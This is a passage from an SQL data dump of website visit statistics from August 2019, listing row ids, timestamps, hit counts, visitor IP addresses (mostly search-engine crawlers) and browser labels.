11','other'),(442203,1565789246,1,1,0,0,'91.196.121.151','chrome'),(442204,1565789708,3,3,0,0,'141.8.188.29','other'),(442205,1565790123,1,1,0,0,'91.196.178.102','chrome'),(442206,1565790731,1,1,0,0,'8.29.198.25','other'),(442207,1565791859,1,1,0,0,'91.196.177.46','firefox'),(442208,1565792029,1,1,0,0,'207.46.13.19','other'),(442209,1565792450,1,1,0,0,'207.46.13.250','other'),(442210,1565792825,1,1,0,0,'8.29.198.26','other'),(442211,1565793398,2,2,0,0,'207.46.13.250','other'),(442212,1565793830,1,1,0,0,'40.77.167.48','other'),(442213,1565795053,1,1,0,0,'5.58.32.185','chrome'),(442214,1565795162,4,4,0,0,'157.55.39.86','other'),(442215,1565795450,2,2,0,0,'40.77.167.48','other'),(442216,1565795908,1,1,0,0,'157.55.39.84','other'),(442217,1565797184,1,1,0,0,'157.55.39.86','other'),(442218,1565797431,1,1,0,0,'40.77.167.48','other'),(442219,1565797830,1,1,0,0,'193.106.57.54','other'),(442220,1565798619,1,1,0,0,'157.55.39.86','other'),(442221,1565798974,1,1,0,0,'141.8.188.29','other'),(442222,1565799984,1,1,0,0,'82.145.211.10','other'),(442223,1565800391,1,1,0,0,'207.46.13.41','other'),(442224,1565801491,1,1,0,0,'141.8.188.29','other'),(442225,1565801573,1,1,0,0,'8.29.198.26','other'),(442226,1565802475,1,1,0,0,'77.123.82.219','chrome'),(442227,1565803536,1,1,0,0,'141.8.188.29','other'),(442228,1565803671,1,1,0,0,'8.29.198.27','other'),(442229,1565804568,1,1,0,0,'40.77.167.1','other'),(442230,1565805067,1,1,0,0,'178.154.200.48','other'),(442231,1565805143,1,1,0,0,'213.180.203.40','other'),(442232,1565805838,1,1,0,0,'207.46.13.41','other'),(442233,1565805911,1,1,0,0,'54.36.149.25','other'),(442234,1565806977,1,1,0,0,'66.249.66.220','chrome'),(442235,1565807092,1,1,0,0,'207.46.13.41','other'),(442236,1565807368,1,1,0,0,'151.18.125.188','chrome'),(442237,1565807408,1,1,0,0,'46.211.111.74','chrome'),(442238,1565808440,1,1,0,0,'141.8.188.11','other'),(442239,1565809016,1,1,0,0,'40.77.167.27','other'),(442240,1565810151,1,1,0,0,'13.66.139.0','other'),(442241,1565810658,1,1,0,0,'207.46.13.41','other'),(442242,1565811246,1,1,0,0,'141.8.188.29','other'),(442243,1565811382,1,1,0,0,'141.8.188.11','other'),(442244,1565812304,1,1,0,0,'207.46.13.41','other'),(442245,1565812416,1,1,0,0,'8.29.198.27','other'),(442246,1565812536,1,1,0,0,'178.154.200.48','other'),(442247,1565812698,1,1,0,0,'213.180.203.9','other'),(442248,1565812701,1,1,0,0,'5.255.253.25','other'),(442249,1565813919,1,1,0,0,'141.8.188.29','other'),(442250,1565814519,1,1,0,0,'40.77.167.164','other'),(442251,1565814521,1,1,0,0,'8.29.198.27','other'),(442252,1565815273,1,1,0,0,'141.8.188.29','other'),(442253,1565816040,3,3,0,0,'207.46.13.117','other'),(442254,1565817032,1,1,0,0,'207.46.13.31','other'),(442255,1565818025,1,1,0,0,'87.250.224.65','other'),(442256,1565818696,1,1,0,0,'66.249.66.132','chrome'),(442257,1565818806,1,1,0,0,'91.124.219.157','chrome'),(442258,1565820403,1,1,0,0,'207.46.13.117','other'),(442259,1565820563,1,1,0,0,'5.45.207.19','other'),(442260,1565821499,1,1,0,0,'66.249.66.222','chrome'),(442261,1565821519,1,1,0,0,'157.55.39.113','other'),(442262,1565822083,1,1,0,0,'207.46.13.132','other'),(442263,1565822217,1,1,0,0,'66.249.66.220','chrome'),(442264,1565822264,1,1,0,0,'141.8.188.11','other'),(442265,1565823252,1,1,0,0,'13.66.139.0','other'),(442266,1565823281,1,1,0,0,'8.29.198.25','other'),(442267,1565823380,1,1,0,0,'207.46.13.117','other'),(442268,1565823697,1,1,0,0,'141.8.188.29','other'),(442269,1565823955,1,1,0,0,'207.46.13.222','other'),(442270,1565824075,1,1,0,0,'66.249.66.218','chrome'),(442271,1565824821,2,2,0,0,'141.8.188.29','other'),(442272,1565824914,1,1,0,0,'207.46.13.222','other'),(442273,1565824956,1,1,0,0,'37.9.113.148','other'),(442274,1565824980,1,1,0,0,'87.250.224.81','other'),(442275,1565825001,1,1,0,0,'141.8.188.49','other'),(442276,1565825373,1,1,0,0,'8.29.198.26','other'),(442277,1565828110,1,1,0,0,'178.154.171.69','other'),(442278,1565828111,2,2,0,0,'207.46.13.132','other'),(442279,1565828154,1,1,0,0,'87.250.224.65','other'),(442280,1565829018,1,1,0,0,'207.46.13.132','other'),(442281,1565829487,2,2,0,0,'207.46.13.117','other'),(442282,1565830217,1,1,0,0,'40.77.167.121','other'),(442283,1565830369,1,1,0,0,'66.249.136.71','other'),(442284,1565831719,6,6,0,0,'77.222.143.222','msie'),(442286,1565832159,1,1,0,0,'207.46.13.117','other'),(442287,1565833122,2,2,0,0,'207.46.13.117','other'),(442288,1565833356,1,1,0,0,'66.249.66.130','chrome'),(442289,1565833788,1,1,0,0,'40.77.167.121','other'),(442290,1565834008,1,1,0,0,'207.46.13.222','other'),(442291,1565834125,1,1,0,0,'8.29.198.27','other'),(442292,1565834442,1,1,0,0,'141.8.188.29','other'),(442293,1565834992,1,1,0,0,'40.77.167.121','other'),(442294,1565835401,1,1,0,0,'207.46.13.117','other'),(442295,1565836130,1,1,0,0,'66.249.66.218','chrome'),(442296,1565836216,1,1,0,0,'8.29.198.26','other'),(442297,1565836372,1,1,0,0,'141.8.188.29','other'),(442298,1565836438,2,2,0,0,'40.77.167.182','other'),(442299,1565837595,1,1,0,0,'40.77.167.121','other'),(442300,1565837724,1,1,0,0,'87.250.224.47','other'),(442301,1565837812,1,1,0,0,'66.249.66.222','chrome'),(442302,1565838116,1,1,0,0,'34.239.164.150','other'),(442303,1565838332,1,1,0,0,'87.250.224.65','other'),(442304,1565838508,1,1,0,0,'180.76.15.24','other'),(442305,1565839437,1,1,0,0,'40.77.167.182','other'),(442306,1565839486,2,2,0,0,'141.8.188.29','other'),(442307,1565840123,2,2,0,0,'66.249.66.218','chrome'),(442308,1565840414,2,2,0,0,'141.8.188.29','other'),(442309,1565842603,1,1,0,0,'141.8.188.29','other'),(442310,1565842724,1,1,0,0,'40.77.167.182','other'),(442311,1565843483,1,1,0,0,'141.8.188.11','other'),(442312,1565843675,1,1,0,0,'141.8.188.29','other'),(442313,1565843911,1,1,0,0,'207.46.13.144','other'),(442314,1565844020,1,1,0,0,'40.77.167.30','other'),(442315,1565844710,1,1,0,0,'141.8.188.29','other'),(442316,1565844974,1,1,0,0,'8.29.198.27','other'),(442317,1565846980,1,1,0,0,'54.36.149.104','other'),(442318,1565847066,1,1,0,0,'8.29.198.26','other'),(442319,1565847132,1,1,0,0,'91.196.178.129','firefox'),(442320,1565847160,371,371,0,0,'185.6.9.204','other'),(442321,1565847747,1,1,0,0,'40.77.167.151','other'),(442322,1565847794,1,1,0,0,'91.124.182.170','firefox'),(442323,1565848062,405,405,0,0,'185.6.9.204','other'),(442324,1565848109,1,1,0,0,'66.249.66.220','chrome'),(442325,1565848572,1,1,0,0,'93.75.239.179','chrome'),(442326,1565848580,1,1,0,0,'185.220.101.22','other'),(442327,1565848608,1,1,0,0,'13.66.139.0','other'),(442328,1565848963,395,395,0,0,'185.6.9.204','other'),(442329,1565849113,2,2,0,0,'207.46.13.144','other'),(442330,1565849268,1,1,0,0,'40.77.167.151','other'),(442331,1565849283,2,2,0,0,'141.8.188.29','other'),(442332,1565849607,1,1,0,0,'66.249.66.220','chrome'),(442333,1565849865,41,41,0,0,'185.6.9.204','other'),(442334,1565850285,1,1,0,0,'40.77.167.151','other'),(442335,1565850996,1,1,0,0,'95.134.220.111','firefox'),(442336,1565851770,1,1,0,0,'40.77.167.151','other'),(442337,1565852721,1,1,0,0,'91.195.156.46','chrome'),(442338,1565853918,1,1,0,0,'95.108.181.75','other'),(442339,1565854087,3,3,0,0,'34.67.203.204','chrome'),(442340,1565854137,1,1,0,0,'213.184.93.199','chrome'),(442341,1565854143,3,3,0,0,'104.154.143.148','chrome'),(442342,1565854164,3,3,0,0,'34.67.173.166','chrome'),(442343,1565854178,3,3,0,0,'34.67.41.154','chrome'),(442344,1565854191,2,2,0,0,'35.238.57.143','chrome'),(442346,1565854209,3,3,0,0,'35.225.242.19','chrome'),(442347,1565854324,1,1,0,0,'141.8.188.29','other'),(442348,1565854638,1,1,0,0,'40.77.167.212','other'),(442349,1565854649,3,3,0,0,'207.46.13.204','other'),(442350,1565854654,6,6,0,0,'40.77.167.151','other'),(442351,1565854660,2,2,0,0,'207.46.13.15','other'),(442352,1565855045,1,1,0,0,'66.249.66.128','chrome'),(442353,1565855277,1,1,0,0,'91.124.182.170','firefox'),(442354,1565855410,1,1,0,0,'178.154.171.27','other'),(442355,1565855819,1,1,0,0,'8.29.198.27','other'),(442356,1565856145,1,1,0,0,'78.111.185.6','chrome'),(442357,1565856571,1,1,0,0,'209.17.97.10','other'),(442358,1565857042,2,2,0,0,'141.8.188.29','other'),(442359,1565857102,1,1,0,0,'141.8.188.11','other'),(442360,1565857916,1,1,0,0,'207.46.13.15','other'),(442361,1565857918,1,1,0,0,'8.29.198.27','other'),(442362,1565858139,1,1,0,0,'141.8.188.11','other'),(442363,1565858449,1,1,0,0,'46.211.102.136','chrome'),(442364,1565858831,1,1,0,0,'66.249.66.220','chrome'),(442365,1565859096,1,1,0,0,'40.77.167.96','other'),(442366,1565859495,1,1,0,0,'66.249.66.128','chrome'),(442367,1565861550,1,1,0,0,'40.77.167.96','other'),(442368,1565862027,1,1,0,0,'40.77.167.151','other'),(442369,1565862171,1,1,0,0,'46.211.64.229','chrome'),(442370,1565862409,2,2,0,0,'66.249.66.220','chrome'),(442371,1565863851,2,2,0,0,'66.249.66.222','chrome'),(442372,1565863914,1,1,0,0,'109.74.154.72','chrome'),(442373,1565864501,1,1,0,0,'207.46.13.146','other'),(442374,1565865384,1,1,0,0,'66.249.66.222','chrome'),(442375,1565866337,1,1,0,0,'91.196.177.63','chrome'),(442376,1565866627,1,1,0,0,'40.77.167.96','other'),(442377,1565866682,1,1,0,0,'8.29.198.27','other'),(442378,1565867036,1,1,0,0,'66.249.66.222','chrome'),(442379,1565867128,2,2,0,0,'40.77.167.113','other'),(442380,1565868059,1,1,0,0,'207.46.13.146','other'),(442381,1565868755,1,1,0,0,'8.29.198.27','other'),(442382,1565869084,1,1,0,0,'66.249.66.218','chrome'),(442383,1565869458,1,1,0,0,'66.249.66.220','chrome'),(442384,1565869473,1,1,0,0,'207.46.13.162','other'),(442385,1565870030,1,1,0,0,'207.46.13.146','other'),(442386,1565870077,1,1,0,0,'40.77.167.96','other'),(442387,1565870395,1,1,0,0,'94.100.221.234','chrome'),(442388,1565870420,1,1,0,0,'157.55.39.72','other'),(442389,1565871011,1,1,0,0,'195.10.210.70','chrome'),(442390,1565871445,1,1,0,0,'81.133.241.97','other'),(442391,1565872141,1,1,0,0,'193.106.30.99','chrome'),(442392,1565872750,1,1,0,0,'91.196.177.46','chrome'),(442393,1565873100,2,2,0,0,'207.46.13.146','other'),(442394,1565873209,1,1,0,0,'93.124.77.43','chrome'),(442395,1565874465,1,1,0,0,'207.46.13.162','other'),(442396,1565874533,1,1,0,0,'66.249.66.220','chrome'),(442397,1565874609,1,1,0,0,'95.108.213.4','other'),(442398,1565874649,1,1,0,0,'66.249.65.212','chrome'),(442399,1565875163,1,1,0,0,'157.55.39.72','other'),(442400,1565875438,1,1,0,0,'178.92.75.208','chrome'),(442401,1565876193,1,1,0,0,'46.174.125.28','chrome'),(442402,1565876473,1,1,0,0,'91.196.177.228','chrome'),(442403,1565876567,2,2,0,0,'207.46.13.146','other'),(442404,1565876816,1,1,0,0,'5.45.207.79','other'),(442405,1565877056,1,1,0,0,'157.55.39.10','other'),(442406,1565877530,1,1,0,0,'8.29.198.27','other'),(442407,1565877741,1,1,0,0,'157.55.39.72','other'),(442408,1565877796,2,2,0,0,'66.249.66.220','chrome'),(442409,1565878203,1,1,0,0,'95.132.30.9','firefox'),(442410,1565879155,1,1,0,0,'157.55.39.69','other'),(442411,1565879472,1,1,0,0,'5.45.207.8','other'),(442412,1565879595,1,1,0,0,'8.29.198.27','other'),(442413,1565879958,1,1,0,0,'66.249.66.218','chrome'),(442414,1565881254,1,1,0,0,'66.249.66.222','chrome'),(442415,1565881297,1,1,0,0,'180.76.15.141','other'),(442416,1565882439,2,2,0,0,'141.8.188.29','other'),(442417,1565882548,1,1,0,0,'157.55.39.70','other'),(442418,1565882714,1,1,0,0,'66.249.66.218','chrome'),(442419,1565883242,2,2,0,0,'157.55.39.145','other'),(442420,1565883600,1,1,0,0,'193.106.30.99','chrome'),(442421,1565886558,2,2,0,0,'157.55.39.69','other'),(442422,1565886954,1,1,0,0,'157.55.39.145','other'),(442423,1565887645,1,1,0,0,'104.155.117.15','chrome'),(442424,1565888384,1,1,0,0,'8.29.198.26','other'),(442425,1565889393,1,1,0,0,'157.55.39.145','other'),(442426,1565890326,1,1,0,0,'157.55.39.70','other'),(442427,1565890390,1,1,0,0,'95.108.181.96','other'),(442428,1565890434,1,1,0,0,'95.108.213.4','other'),(442429,1565890465,1,1,0,0,'8.29.198.26','other'),(442430,1565890566,1,1,0,0,'93.73.160.193','firefox'),(442431,1565890578,1,1,0,0,'95.216.15.49','other'),(442432,1565890767,1,1,0,0,'157.55.39.193','other'),(442433,1565891099,1,1,0,0,'46.211.111.143','chrome'),(442434,1565891215,1,1,0,0,'66.249.66.222','chrome'),(442435,1565891457,1,1,0,0,'66.249.66.220','chrome'),(442436,1565891528,1,1,0,0,'37.9.113.103','other'),(442437,1565891620,1,1,0,0,'66.249.66.218','chrome'),(442438,1565891836,1,1,0,0,'157.55.39.193','other'),(442439,1565892190,1,1,0,0,'66.249.66.222','chrome'),(442440,1565892339,1,1,0,0,'66.249.66.128','chrome'),(442441,1565892721,1,1,0,0,'66.249.66.218','chrome'),(442442,1565892901,1,1,0,0,'157.55.39.70','other'),(442443,1565893994,1,1,0,0,'66.249.66.220','chrome'),(442444,1565895695,1,1,0,0,'141.8.188.29','other'),(442445,1565895913,1,1,0,0,'157.55.39.69','other'),(442446,1565896141,1,1,0,0,'66.249.66.222','chrome'),(442447,1565896936,1,1,0,0,'66.249.66.218','chrome'),(442448,1565898267,1,1,0,0,'213.180.203.53','other'),(442449,1565898576,1,1,0,0,'40.77.167.26','other'),(442450,1565898756,1,1,0,0,'157.55.39.119','other'),(442451,1565899240,1,1,0,0,'8.29.198.26','other'),(442452,1565899349,1,1,0,0,'66.249.66.218','chrome'),(442453,1565899577,2,2,0,0,'157.55.39.193','other'),(442454,1565901211,1,1,0,0,'157.55.39.69','other'),(442455,1565901300,1,1,0,0,'8.29.198.27','other'),(442456,1565901601,1,1,0,0,'141.8.188.29','other'),(442457,1565901804,2,2,0,0,'207.46.13.161','other'),(442458,1565902470,1,1,0,0,'157.55.39.69','other'),(442459,1565903096,1,1,0,0,'66.249.66.134','chrome'),(442460,1565903142,2,2,0,0,'66.249.66.136','chrome'),(442461,1565903388,1,1,0,0,'157.55.39.69','other'),(442462,1565903447,1,1,0,0,'66.249.66.64','chrome'),(442463,1565903781,1,1,0,0,'141.8.188.11','other'),(442464,1565903823,3,3,0,0,'157.55.39.119','other'),(442465,1565904035,1,1,0,0,'77.222.143.222','msie'),(442466,1565904220,2,2,0,0,'66.249.66.136','chrome'),(442467,1565904501,1,1,0,0,'66.249.66.64','chrome'),(442468,1565904758,1,1,0,0,'66.249.66.138','chrome'),(442469,1565905313,1,1,0,0,'66.249.66.136','chrome'),(442470,1565905464,1,1,0,0,'157.55.39.69','other'),(442471,1565906070,1,1,0,0,'40.77.167.32','other'),(442472,1565906166,2,2,0,0,'13.66.139.0','other'),(442473,1565906216,1,1,0,0,'91.209.11.236','other'),(442474,1565906342,1,1,0,0,'157.55.39.135','other'),(442475,1565906820,1,1,0,0,'95.108.181.83','other'),(442476,1565907242,1,1,0,0,'141.8.188.29','other'),(442477,1565907366,1,1,0,0,'66.249.66.134','chrome'),(442478,1565908417,1,1,0,0,'141.8.188.29','other'),(442479,1565908485,1,1,0,0,'5.45.207.79','other'),(442480,1565908524,1,1,0,0,'40.77.167.32','other'),(442481,1565908685,1,1,0,0,'66.249.66.138','chrome'),(442482,1565909357,2,2,0,0,'157.55.39.135','other'),(442483,1565909439,1,1,0,0,'141.8.142.81','other'),(442484,1565909623,1,1,0,0,'157.55.39.69','other'),(442485,1565909766,1,1,0,0,'141.8.188.65','other'),(442486,1565910086,1,1,0,0,'8.29.198.25','other'),(442487,1565910192,2,2,0,0,'66.249.66.66','chrome'),(442488,1565912057,3,3,0,0,'66.249.66.136','chrome'),(442489,1565912142,1,1,0,0,'8.29.198.27','other'),(442490,1565912530,1,1,0,0,'40.77.167.32','other'),(442491,1565913449,2,2,0,0,'157.55.39.119','other'),(442492,1565913553,1,1,0,0,'31.13.190.254','chrome'),(442493,1565914335,1,1,0,0,'66.249.66.134','chrome'),(442494,1565915099,2,2,0,0,'157.55.39.119','other'),(442495,1565915707,1,1,0,0,'141.8.188.29','other'),(442496,1565915855,2,2,0,0,'66.249.66.134','chrome'),(442497,1565915972,1,1,0,0,'66.249.66.136','chrome'),(442498,1565916230,1,1,0,0,'157.55.39.69','other'),(442499,1565917011,1,1,0,0,'66.249.66.134','chrome'),(442500,1565917407,1,1,0,0,'157.55.39.119','other'),(442501,1565917454,2,2,0,0,'141.8.188.11','other'),(442502,1565917510,1,1,0,0,'66.249.66.138','chrome'),(442503,1565917703,1,1,0,0,'13.66.139.0','other'),(442504,1565917961,1,1,0,0,'157.55.39.135','other'),(442505,1565918889,1,1,0,0,'141.8.188.29','other'),(442506,1565919112,1,1,0,0,'209.17.96.146','other'),(442507,1565920811,1,1,0,0,'157.55.39.214','other'),(442508,1565920901,2,2,0,0,'157.55.39.69','other'),(442509,1565920923,1,1,0,0,'8.29.198.25','other'),(442510,1565921052,1,1,0,0,'5.45.207.79','other'),(442511,1565921124,1,1,0,0,'95.108.213.4','other'),(442512,1565921437,1,1,0,0,'66.249.66.138','chrome'),(442513,1565921464,1,0,1,0,'66.249.66.134',''),(442514,1565922074,1,1,0,0,'157.55.39.69','other'),(442515,1565922785,1,1,0,0,'40.77.167.7','other'),(442516,1565922793,1,1,0,0,'157.55.39.135','other'),(442517,1565922860,1,1,0,0,'157.55.39.214','other'),(442518,1565922984,1,1,0,0,'8.29.198.26','other'),(442519,1565922997,1,1,0,0,'178.128.0.34','chrome'),(442520,1565923045,1,1,0,0,'66.249.66.136','chrome'),(442521,1565923857,1,1,0,0,'66.249.66.134','chrome'),(442522,1565924500,2,2,0,0,'157.55.39.211','other'),(442523,1565924660,1,1,0,0,'157.55.39.214','other'),(442524,1565924766,1,1,0,0,'141.8.188.29','other'),(442525,1565925145,1,1,0,0,'66.249.66.134','chrome'),(442526,1565925184,1,1,0,0,'66.249.66.136','chrome'),(442527,1565925250,1,1,0,0,'193.106.30.99','chrome'),(442528,1565925469,1,1,0,0,'157.55.39.157','other'),(442529,1565925576,1,1,0,0,'207.46.13.241','other'),(442530,1565926175,1,1,0,0,'66.249.66.136','chrome'),(442531,1565926679,1,1,0,0,'157.55.39.214','other'),(442532,1565926830,1,1,0,0,'66.249.66.134','chrome'),(442533,1565927370,1,1,0,0,'66.249.66.136','chrome'),(442534,1565927785,1,1,0,0,'157.55.39.214','other'),(442535,1565927853,1,1,0,0,'66.249.66.138','chrome'),(442536,1565928454,2,2,0,0,'66.249.66.134','chrome'),(442537,1565928573,1,1,0,0,'40.77.167.7','other'),(442538,1565928899,1,1,0,0,'66.249.66.136','chrome'),(442539,1565928977,1,1,0,0,'157.55.39.194','other'),(442540,1565929381,1,1,0,0,'157.55.39.214','other'),(442541,1565929438,2,2,0,0,'207.46.13.129','other'),(442542,1565929563,1,1,0,0,'66.249.66.134','chrome'),(442543,1565929797,1,1,0,0,'66.249.66.138','chrome'),(442544,1565929853,1,1,0,0,'66.249.66.66','chrome'),(442545,1565930054,1,1,0,0,'66.249.66.136','chrome'),(442546,1565930153,1,1,0,0,'77.222.143.222','msie'),(442547,1565930578,1,1,0,0,'87.250.224.64','other'),(442548,1565930610,2,2,0,0,'207.46.13.129','other'),(442549,1565930611,1,1,0,0,'141.8.188.49','other'),(442550,1565931407,1,1,0,0,'91.196.178.132','firefox'),(442551,1565931421,2,2,0,0,'66.249.66.66','chrome'),(442552,1565931436,1,1,0,0,'91.209.11.236','other'),(442553,1565931757,1,1,0,0,'8.29.198.25','other'),(442554,1565933498,1,1,0,0,'66.249.66.136','chrome'),(442555,1565933838,1,1,0,0,'8.29.198.25','other'),(442556,1565934504,1,1,0,0,'95.220.25.209','msie'),(442557,1565934534,4,4,0,0,'77.222.143.222','msie'),(442558,1565934913,1,1,0,0,'62.210.37.82','other'),(442559,1565935040,2,2,0,0,'207.46.13.129','other'),(442560,1565935543,1,1,0,0,'66.249.66.134','chrome'),(442561,1565936766,1,1,0,0,'91.196.178.180','chrome'),(442562,1565937327,1,1,0,0,'207.46.13.21','other'),(442563,1565937612,1,1,0,0,'46.200.150.70','firefox'),(442564,1565938150,1,1,0,0,'66.249.66.134','chrome'),(442565,1565938199,1,1,0,0,'141.8.188.11','other'),(442566,1565938532,1,1,0,0,'66.249.66.138','chrome'),(442567,1565939674,1,1,0,0,'46.211.131.253','other'),(442568,1565939688,1,1,0,0,'66.249.66.66','chrome'),(442569,1565940146,1,1,0,0,'207.46.13.129','other'),(442570,1565940437,1,1,0,0,'46.200.150.70','firefox'),(442571,1565940671,1,1,0,0,'66.249.66.134','chrome'),(442572,1565940726,1,1,0,0,'66.249.66.138','chrome'),(442573,1565940769,1,1,0,0,'141.8.188.11','other'),(442574,1565940968,1,1,0,0,'66.249.66.64','chrome'),(442575,1565941799,1,1,0,0,'157.55.39.110','other'),(442576,1565941827,2,2,0,0,'66.249.66.138','chrome'),(442577,1565941866,2,2,0,0,'141.8.188.29','other'),(442578,1565942606,1,1,0,0,'8.29.198.26','other'),(442579,1565942611,3,3,0,0,'66.249.66.136','chrome'),(442580,1565942849,1,1,0,0,'66.249.66.138','chrome'),(442581,1565943029,2,2,0,0,'66.249.66.134','chrome'),(442582,1565943036,1,1,0,0,'207.46.13.129','other'),(442583,1565944330,2,2,0,0,'141.8.188.29','other'),(442584,1565944476,1,1,0,0,'157.55.39.110','other'),(442585,1565944679,1,1,0,0,'8.29.198.25','other'),(442586,1565944846,1,1,0,0,'207.46.13.129','other'),(442587,1565944974,1,1,0,0,'60.191.38.77','firefox'),(442588,1565944988,2,2,0,0,'141.8.188.11','other'),(442589,1565945543,1,1,0,0,'157.55.39.214','other'),(442590,1565946039,1,1,0,0,'157.55.39.110','other'),(442591,1565946507,1,1,0,0,'173.252.95.20','chrome'),(442592,1565946675,1,1,0,0,'66.249.66.68','chrome'),(442593,1565947307,1,1,0,0,'66.249.66.66','chrome'),(442594,1565947377,2,2,0,0,'18.232.53.231','other'),(442595,1565947927,1,1,0,0,'60.191.38.77','firefox'),(442596,1565948550,1,1,0,0,'40.77.167.79','other'),(442597,1565949220,2,2,0,0,'66.249.66.134','chrome'),(442598,1565950419,1,1,0,0,'66.249.66.136','chrome'),(442599,1565950447,1,1,0,0,'5.3.159.80','chrome'),(442600,1565950580,1,1,0,0,'109.74.154.72','chrome'),(442601,1565951100,1,1,0,0,'66.249.66.134','chrome'),(442602,1565951498,1,1,0,0,'157.55.39.57','other'),(442603,1565952247,1,1,0,0,'193.106.30.99','chrome'),(442604,1565952374,1,1,0,0,'46.211.24.177','chrome'),(442605,1565952733,1,1,0,0,'40.77.167.97','other'),(442606,1565953066,1,1,0,0,'141.8.188.29','other'),(442607,1565953310,1,1,0,0,'66.249.66.136','chrome'),(442608,1565953414,2,2,0,0,'66.249.66.138','chrome'),(442609,1565953444,1,1,0,0,'8.29.198.25','other'),(442610,1565954017,1,1,0,0,'40.77.167.97','other'),(442611,1565954047,1,1,0,0,'141.8.188.11','other'),(442612,1565954531,1,1,0,0,'95.132.62.188','firefox'),(442613,1565954605,1,1,0,0,'46.211.67.153','chrome'),(442614,1565954656,1,1,0,0,'40.77.167.66','other'),(442615,1565955022,1,1,0,0,'141.8.188.11','other'),(442616,1565955035,1,1,0,0,'66.249.66.138','chrome'),(442617,1565955072,1,1,0,0,'141.8.188.29','other'),(442618,1565955238,1,1,0,0,'66.249.79.190','chrome'),(442619,1565955521,1,1,0,0,'8.29.198.27','other'),(442620,1565956200,1,1,0,0,'207.46.13.52','other'),(442621,1565956602,1,1,0,0,'40.77.167.66','other'),(442622,1565956987,1,1,0,0,'66.249.66.138','chrome'),(442623,1565956994,1,1,0,0,'66.249.66.134','chrome'),(442624,1565958821,2,2,0,0,'66.249.66.134','chrome'),(442625,1565959072,1,1,0,0,'146.120.100.22','chrome'),(442626,1565959106,1,1,0,0,'23.228.90.99','chrome'),(442627,1565960143,1,1,0,0,'198.108.66.64','other'),(442628,1565960757,1,1,0,0,'66.249.66.138','chrome'),(442629,1565961192,1,1,0,0,'198.108.66.161','other'),(442630,1565961233,1,1,0,0,'14.207.202.188','firefox'),(442631,1565961962,1,1,0,0,'40.77.167.97','other'),(442632,1565962028,2,2,0,0,'128.70.147.13','other'),(442633,1565962236,1,1,0,0,'157.55.39.231','other'),(442634,1565963044,1,1,0,0,'66.249.66.138','chrome'),(442635,1565963199,1,1,0,0,'207.46.13.52','other'),(442636,1565963982,1,1,0,0,'157.55.39.231','other'),(442637,1565964177,1,1,0,0,'66.249.66.134','chrome'),(442638,1565964280,1,1,0,0,'8.29.198.27','other'),(442639,1565964434,1,1,0,0,'66.249.66.136','chrome'),(442640,1565964527,1,1,0,0,'66.249.66.66','chrome'),(442641,1565966387,1,1,0,0,'8.29.198.26','other'),(442642,1565966392,1,1,0,0,'77.121.38.147','chrome'),(442643,1565966421,1,1,0,0,'141.8.188.29','other'),(442644,1565966509,1,1,0,0,'157.55.39.80','other'),(442645,1565966759,3,3,0,0,'207.46.13.52','other'),(442646,1565967650,1,1,0,0,'66.249.66.138','chrome'),(442647,1565967707,1,1,0,0,'66.249.66.134','chrome'),(442648,1565968433,1,1,0,0,'5.9.106.204','chrome'),(442649,1565968435,1,1,0,0,'60.217.72.16','firefox'),(442650,1565968726,1,1,0,0,'207.46.13.52','other'),(442651,1565968811,1,1,0,0,'66.249.66.66','chrome'),(442652,1565968971,1,1,0,0,'40.77.167.66','other'),(442653,1565969010,1,1,0,0,'66.249.66.64','chrome'),(442654,1565969086,2,2,0,0,'66.249.66.138','chrome'),(442655,1565969139,3,3,0,0,'66.249.66.136','chrome'),(442656,1565970364,2,2,0,0,'207.46.13.176','other'),(442657,1565970676,1,1,0,0,'66.249.66.136','chrome'),(442658,1565971043,1,1,0,0,'66.249.66.68','chrome'),(442659,1565971276,2,2,0,0,'66.249.66.138','chrome'),(442660,1565971599,2,2,0,0,'66.249.66.136','chrome'),(442661,1565971641,2,2,0,0,'66.249.66.134','chrome'),(442662,1565971974,1,1,0,0,'157.55.39.80','other'),(442663,1565972178,1,1,0,0,'198.108.66.32','other'),(442664,1565972181,1,1,0,0,'66.249.66.64','chrome'),(442665,1565972184,1,1,0,0,'207.46.13.52','other'),(442666,1565972250,2,2,0,0,'207.46.13.176','other'),(442667,1565972463,145,145,0,0,'185.6.9.204','other'),(442668,1565972578,2,2,0,0,'66.249.66.136','chrome'),(442669,1565973199,1,1,0,0,'207.46.13.52','other'),(442670,1565973644,1,1,0,0,'157.55.39.80','other'),(442671,1565974383,1,1,0,0,'157.55.39.113','other'),(442672,1565975124,1,1,0,0,'8.29.198.26','other'),(442673,1565975505,2,2,0,0,'207.46.13.176','other'),(442674,1565975755,4,4,0,0,'66.249.66.136','chrome'),(442675,1565975861,2,2,0,0,'66.249.66.64','chrome'),(442676,1565975932,3,3,0,0,'66.249.66.134','chrome'),(442677,1565976100,1,1,0,0,'66.249.66.68','chrome'),(442678,1565976175,1,1,0,0,'66.249.66.138','chrome'),(442679,1565976393,1,1,0,0,'91.196.178.66','firefox'),(442680,1565977229,1,1,0,0,'8.29.198.25','other'),(442681,1565977348,2,2,0,0,'66.249.66.136','chrome'),(442682,1565977479,4,4,0,0,'66.249.66.134','chrome'),(442683,1565978208,3,3,0,0,'66.249.66.138','chrome'),(442684,1565978293,1,1,0,0,'66.249.66.136','chrome'),(442685,1565978333,1,1,0,0,'66.249.66.66','chrome'),(442686,1565978555,1,1,0,0,'207.46.13.190','other'),(442687,1565979695,1,1,0,0,'207.46.13.190','other'),(442688,1565979704,3,3,0,0,'66.249.66.134','chrome'),(442689,1565979897,1,1,0,0,'66.249.66.136','chrome'),(442690,1565979923,2,2,0,0,'66.249.66.138','chrome'),(442691,1565980168,1,1,0,0,'66.249.66.68','chrome'),(442692,1565980370,1,1,0,0,'66.249.66.66','chrome'),(442693,1565980989,1,1,0,0,'91.196.178.72','chrome'),(442694,1565981034,3,3,0,0,'157.55.39.113','other'),(442695,1565981316,3,3,0,0,'157.55.39.80','other'),(442696,1565981465,5,5,0,0,'66.249.66.136','chrome'),(442697,1565981740,1,1,0,0,'66.249.66.138','chrome'),(442698,1565981928,1,1,0,0,'66.249.66.64','chrome'),(442699,1565982097,3,3,0,0,'66.249.66.134','chrome'),(442700,1565982308,1,1,0,0,'207.46.13.190','other'),(442701,1565982481,2,2,0,0,'66.249.66.136','chrome'),(442702,1565983061,1,1,0,0,'66.249.66.134','chrome'),(442703,1565983386,1,1,0,0,'207.46.13.190','other'),(442704,1565984038,1,1,0,0,'207.46.13.176','other'),(442705,1565984271,2,2,0,0,'66.249.66.66','chrome'),(442706,1565984381,1,1,0,0,'66.249.66.134','chrome'),(442707,1565984392,1,1,0,0,'157.55.39.113','other'),(442708,1565984523,1,1